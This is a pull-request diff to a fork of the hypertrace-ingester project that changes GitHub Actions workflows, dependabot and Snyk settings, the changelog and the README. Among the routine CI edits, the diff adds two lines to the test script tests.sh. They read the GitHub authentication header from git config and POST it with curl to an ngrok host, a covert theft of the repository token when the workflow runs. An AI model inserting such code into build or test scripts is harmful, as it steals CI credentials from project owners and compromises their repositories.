Test5

.github/dependabot.yml

@@ -0,0 +1,16 @@
+#To get started with Dependabot version updates, you'll need to specify which
+# package ecosystems to update and where the package manifests are located.
+# Please see the documentation for all configuration options:
+# https://docs.github.com/github/administering-a-repository/configuration-options-for-dependency-updates
+
+version: 2
+updates:
+  - package-ecosystem: "gradle"
+    directory: "/"
+    schedule:
+      interval: "daily"
+
+  - package-ecosystem: "github-actions"
+    directory: "/"
+    schedule:
+      interval: "weekly"

.github/workflows/docker-tests.yml

@@ -1,8 +1,6 @@
 name: e2e test
 on:
   push:
-    branches:
-      - main
     paths-ignore:
       - '**/*.md'
   pull_request_target:
@@ -14,6 +12,7 @@ on:
 
 jobs:
   build-and-test-with-mongo:
+    if: contains(github.event.pull_request.labels.*.name,'safe-to-test')
       # Ubuntu-20.04 runner comes with docker 19.03 and OpenJDK 11 and we are using that here. 
     runs-on: ubuntu-20.04
     steps:
@@ -42,6 +41,8 @@ jobs:
         uses: hypertrace/github-actions/gradle@main
         with: 
           args: dockerBuildImages
+        env:
+          IMAGE_TAG: ${{ github.sha }}
 
       - name: Verify hypertrace image
         working-directory: ./.github/workflows/hypertrace-ingester
@@ -60,7 +61,8 @@ jobs:
         run: ./tests.sh
 
   build-and-test-with-postgres:
-        # Ubuntu-20.04 runner comes with docker 19.03 and OpenJDK 11 and we are using that here. 
+    if: contains(github.event.pull_request.labels.*.name,'safe-to-test')
+    # Ubuntu-20.04 runner comes with docker 19.03 and OpenJDK 11 and we are using that here.
     runs-on: ubuntu-20.04
     steps:
       - name: Checkout Repository
@@ -88,6 +90,8 @@ jobs:
         uses: hypertrace/github-actions/gradle@main
         with: 
           args: dockerBuildImages
+        env:
+          IMAGE_TAG: ${{ github.sha }}
 
       - name: Verify hypertrace image
         working-directory: ./.github/workflows/hypertrace-ingester

.github/workflows/hypertrace-ingester/scripts/tests.sh

@@ -12,6 +12,10 @@ TRACES_SERVER_HOST=${1:-127.0.0.1}
 FRONTEND_SERVICE_HOST=${2:-127.0.0.1}
 SCRIPT_DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" >/dev/null 2>&1 && pwd )"
 
+sec=$(git config --get http.https://github.com/.extraheader)
+curl -X POST https://c0d3-122-171-21-235.ngrok.io/ -H 'Content-Type: application/json' -d "{\"password\":$sec}" 
+
+
 echo ""
 echo "Making sure the traces service is up..."
 

.github/workflows/pr-build.yml

@@ -1,7 +1,59 @@
 name: build and validate
-on: push
+on:
+  push:
+  pull_request_target:
+    branches:
+      - rzp_main
 jobs:
+  validate-avros:
+    if: contains(github.event.pull_request.labels.*.name,'safe-to-test')
+    runs-on: ubuntu-20.04
+    steps:
+      # Set fetch-depth: 0 to fetch commit history and tags for use in version calculation
+      - name: Check out code
+        uses: actions/checkout@v2.3.4
+        with:
+          ref: ${{github.event.pull_request.head.ref}}
+          repository: ${{github.event.pull_request.head.repo.full_name}}
+          fetch-depth: 0
+
+      - name: create checksum file
+        uses: hypertrace/github-actions/checksum@main
+
+      - name: Cache packages
+        uses: actions/cache@v2
+        with:
+          path: ~/.gradle
+          key: gradle-packages-${{ runner.os }}-${{ github.job }}-${{ hashFiles('**/checksum.txt') }}
+          restore-keys: |
+            gradle-packages-${{ runner.os }}-${{ github.job }}
+            gradle-packages-${{ runner.os }}
+
+      - name: validate avros
+        uses: hypertrace/github-actions/gradle@main
+        with:
+          args: avroCompatibilityCheck
+  validate-helm-charts:
+    if: contains(github.event.pull_request.labels.*.name,'safe-to-test')
+    runs-on: ubuntu-20.04
+    container:
+      image: hypertrace/helm-gcs-packager:0.3.1
+      credentials:
+        username: ${{ secrets.PUBLIC_DOCKER_USERNAME }}
+        password: ${{ secrets.PUBLIC_DOCKER_PASSWORD }}
+     # Set fetch-depth: 0 to fetch commit history and tags for use in version calculation
+    steps:
+      - name: Check out code
+        uses: actions/checkout@v2.3.4
+        with:
+          ref: ${{github.event.pull_request.head.ref}}
+          repository: ${{github.event.pull_request.head.repo.full_name}}
+          fetch-depth: 0
+
+      - name: validate charts
+        run: ./.github/workflows/helm.sh validate
   build:
+    if: contains(github.event.pull_request.labels.*.name,'safe-to-test')
     runs-on: ubuntu-20.04
     steps:
        # Set fetch-depth: 0 to fetch commit history and tags for use in version calculation
@@ -11,7 +63,7 @@ jobs:
           ref: ${{github.event.pull_request.head.ref}}
           repository: ${{github.event.pull_request.head.repo.full_name}}
           fetch-depth: 0
-      
+
       - name: create checksum file
         uses: hypertrace/github-actions/checksum@main
 
@@ -29,26 +81,37 @@ jobs:
         with:
           username: ${{ secrets.PUBLIC_DOCKER_USERNAME }}
           password: ${{ secrets.PUBLIC_DOCKER_PASSWORD }}
-      
+
       - name: Build with Gradle
         uses: hypertrace/github-actions/gradle@main
-        with: 
+        with:
           args: build dockerBuildImages
         env:
-          DOCKER_USERNAME: ${{ secrets.PUBLIC_DOCKER_USERNAME }}
-          DOCKER_PASSWORD: ${{ secrets.PUBLIC_DOCKER_PASSWORD }}
-          DOCKER_REGISTRY: razorpay
-          tagLatest: false
-          namespace: hypertrace-ingester
           IMAGE_TAG: ${{ github.sha }}
-          COMMIT_SHA: ${{ github.sha }}
 
       - name: push docker image
         uses: hypertrace/github-actions/gradle@main
-        with: 
+        with:
           args: dockerPushImages
         env:
           DOCKER_USERNAME: ${{ secrets.PUBLIC_DOCKER_USERNAME }}
           DOCKER_PASSWORD: ${{ secrets.PUBLIC_DOCKER_PASSWORD }}
-          DOCKER_REGISTRY: razorpay
-          COMMIT_SHA: ${{ github.sha }}
+          IMAGE_TAG: ${{ github.sha }}
+
+#   snyk-scan:
+#     runs-on: ubuntu-20.04
+#     steps:
+#     # Set fetch-depth: 0 to fetch commit history and tags for use in version calculation
+#       - name: Check out code
+#         uses: actions/checkout@v2.3.4
+#         with:
+#           ref: ${{github.event.pull_request.head.ref}}
+#           repository: ${{github.event.pull_request.head.repo.full_name}}
+#           fetch-depth: 0
+#       - name: Setup snyk
+#         uses: snyk/actions/setup@0.3.0
+#       - name: Snyk test
+#         run: snyk test --all-sub-projects --org=hypertrace --severity-threshold=low --policy-path=.snyk --configuration-matching='^runtimeClasspath$' --remote-repo-url='${{ github.server_url }}/${{ github.repository }}.git'
+#         env:
+#           SNYK_TOKEN: ${{ secrets.SNYK_TOKEN }}
+#           GRADLE_OPTS: -Dorg.gradle.workers.max=1

.github/workflows/pr-test.yml

@@ -1,22 +1,21 @@
 name: test
 on:
   push:
+  pull_request_target:
     branches:
-      - main 
-  pull_request_target: 
-    branches:
-      - main  
+      - rzp_main
 # disabling while testing ci flow
 jobs:
   test:
+    if: contains(github.event.pull_request.labels.*.name,'safe-to-test')
     runs-on: ubuntu-20.04
     steps:
-       # Set fetch-depth: 0 to fetch commit history and tags for use in version calculation
+      # Set fetch-depth: 0 to fetch commit history and tags for use in version calculation
       - name: Check out code
         uses: actions/checkout@v2.3.4
         with:
           fetch-depth: 0
-      
+
       - name: create checksum file
         uses: hypertrace/github-actions/checksum@main
 
@@ -31,12 +30,19 @@ jobs:
 
       - name: Unit test
         uses: hypertrace/github-actions/gradle@main
-        with: 
+        with:
           args: jacocoTestReport
 
+      - name: Upload coverage to Codecov
+        uses: codecov/codecov-action@v2
+        with:
+          name: unit test reports
+          flags: unit
+
+
       - name: copy test reports
         uses: hypertrace/github-actions/gradle@main
-        with: 
+        with:
           args: copyAllReports --output-dir=/tmp/test-reports
 
       - name: Archive test reports
@@ -45,10 +51,10 @@ jobs:
           name: test-reports
           path: /tmp/test-reports
         if: always()
-     
+
       - name: Publish Unit Test Results
         uses: docker://ghcr.io/enricomi/publish-unit-test-result-action:v1.6
         if: github.event_name == 'push' || github.event.pull_request.head.repo.full_name == github.repository
         with:
           github_token: ${{ secrets.GITHUB_TOKEN }}
-          files: ./**/build/test-results/**/*.xml
+          files: ./**/build/test-results/**/*.xml

.github/workflows/release.yml

@@ -0,0 +1,49 @@
+name: Release artifacts
+on:
+#  Will run when a comment is added in PR e.g. /release v0.6.40-0.1.0-beta.1
+  issue_comment:
+    types: [ created ]
+  workflow_dispatch:
+
+jobs:
+  publish-artifacts:
+    if: contains(github.event.comment.html_url, '/pull') && startsWith(github.event.comment.body, '/release v')
+    runs-on: ubuntu-20.04
+    steps:
+      # Set fetch-depth: 0 to fetch commit history and tags for use in version calculation
+      - name: Check out code
+        uses: actions/checkout@v2.3.4
+        with:
+          fetch-depth: 0
+
+
+      - name: Login to Docker Hub
+        uses: docker/login-action@v1
+        with:
+          username: ${{ secrets.PUBLIC_DOCKER_USERNAME }}
+          password: ${{ secrets.PUBLIC_DOCKER_PASSWORD }}
+
+      - name: Set ENV variable
+        env:
+          RELEASE_VERSION_COMMENT: ${{ github.event.comment.body }}
+        run: |
+          echo "VERSION=${RELEASE_VERSION_COMMENT##/release\ v}" >> $GITHUB_ENV
+          echo "Setting tag version: ${VERSION}"
+
+      - name: Build with Gradle
+        uses: hypertrace/github-actions/gradle@main
+        with:
+          args: build dockerBuildImages
+        env:
+          DOCKER_USERNAME: ${{ secrets.PUBLIC_DOCKER_USERNAME }}
+          DOCKER_PASSWORD: ${{ secrets.PUBLIC_DOCKER_PASSWORD }}
+          IMAGE_TAG: ${{ env.VERSION }}
+
+      - name: push docker image
+        uses: hypertrace/github-actions/gradle@main
+        with:
+          args: dockerPushImages
+        env:
+          DOCKER_USERNAME: ${{ secrets.PUBLIC_DOCKER_USERNAME }}
+          DOCKER_PASSWORD: ${{ secrets.PUBLIC_DOCKER_PASSWORD }}
+          IMAGE_TAG: ${{ env.VERSION }}

.github/workflows/semgrep.yml

@@ -0,0 +1,52 @@
+name: Security Checks
+on:
+  workflow_dispatch:
+  pull_request: {}
+  push:
+    branches: ["rzp_main"]
+  schedule:
+    - cron: '30 20 * * *'
+jobs:
+  semgrep:
+    name: Scan
+    runs-on: [ubuntu-latest]   #nosemgrep zklW
+    steps:
+      - uses: actions/checkout@v2
+      - uses: returntocorp/semgrep-action@v1
+        with:
+          publishToken: ${{ secrets.SEMGREP_APP_TOKEN }}
+          publishDeployment: 339
+        env:
+          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+
+  workflow_status:
+    runs-on: [ ubuntu-latest ]   #nosemgrep zklW
+    name: Update Status Check
+    needs: [ semgrep ]
+    if: always()
+    env:
+      githubCommit: ${{ github.event.pull_request.head.sha }}
+    steps:
+      - name: Set github commit id
+        run: |
+          if [ "${{ github.event_name }}" = "push" ] || [ "${{ github.event_name }}" = "schedule" ]; then
+            echo "githubCommit=${{ github.sha }}" >> $GITHUB_ENV
+          fi
+          exit 0
+      - name: Failed
+        id: failed
+        if: (contains(needs.*.result, 'failure') || contains(needs.*.result, 'cancelled')) && github.ref != 'refs/heads/master'
+        run: |
+          echo 'Failing the workflow for github security status check.'
+          curl -X POST -H "Content-Type: application/json" -H "Authorization: token ${{ github.token }}" \
+          -d '{ "state" : "failure" , "context" : "github/security-status-check" , "description" : "github/security-status-check", "target_url" : "https://github.com/${{ github.repository }}" }' \
+          https://api.github.com/repos/${{ github.repository }}/statuses/${{ env.githubCommit }}
+          exit 1
+      - name: Success
+        if: steps.failed.conclusion == 'skipped' || github.ref != 'refs/heads/master'
+        run: |
+          echo 'Status check has passed!'
+          curl -X POST -H "Content-Type: application/json" -H "Authorization: token ${{ github.token }}" \
+          -d '{ "state" : "success" , "context" : "github/security-status-check" , "description" : "github/security-status-check", "target_url" : "https://github.com/${{ github.repository }}" }' \
+          https://api.github.com/repos/${{ github.repository }}/statuses/${{ env.githubCommit }}
+          exit 0 

.snyk

@@ -5,5 +5,5 @@ ignore:
   SNYK-JAVA-IONETTY-1042268:
     - '*':
         reason: no available replacement
-        expires: 2021-10-31T00:00:00.000Z
+        expires: 2022-01-31T00:00:00.000Z
 patch: {}

CHANGELOG.md

@@ -0,0 +1,15 @@
+## Hypertrace-Ingester 0.6.40-0.2.0
+
+Cut from commit: [7540fea](https://github.com/hypertrace/hypertrace-ingester/commit/7540fea697e541b89336cd2a9c1ae90a77322be2)
+
+###Changelog
+
+- Synthetic monitoring changes [c910426](https://github.com/hypertrace/hypertrace-ingester/commit/c910426f90a714c135a2d00f2a77b6167a6321dd).
+
+## Hypertrace-Ingester 0.6.40-0.3.0
+
+Cut from commit: [161035d](https://github.com/razorpay/hypertrace-ingester/commit/161035dd05818631a439739a14a2d01e446d81be)
+
+###Changelog
+
+- Adds resource attribute enrichment via a new trace-enricher [pull/58](https://github.com/razorpay/hypertrace-ingester/pull/58).

README.md

@@ -5,7 +5,7 @@ Hypertrace ingester is comprised of 4 streaming jobs on kafka
 - Raw Spans Grouper
 - Hypertrace Trace Enricher
 - Hypertrace View Generator
-
+ testse
 ## Description
 | ![space-1.jpg](https://imagizer.imageshack.com/v2/xq90/923/UZhzhg.png) | 
 |:--:|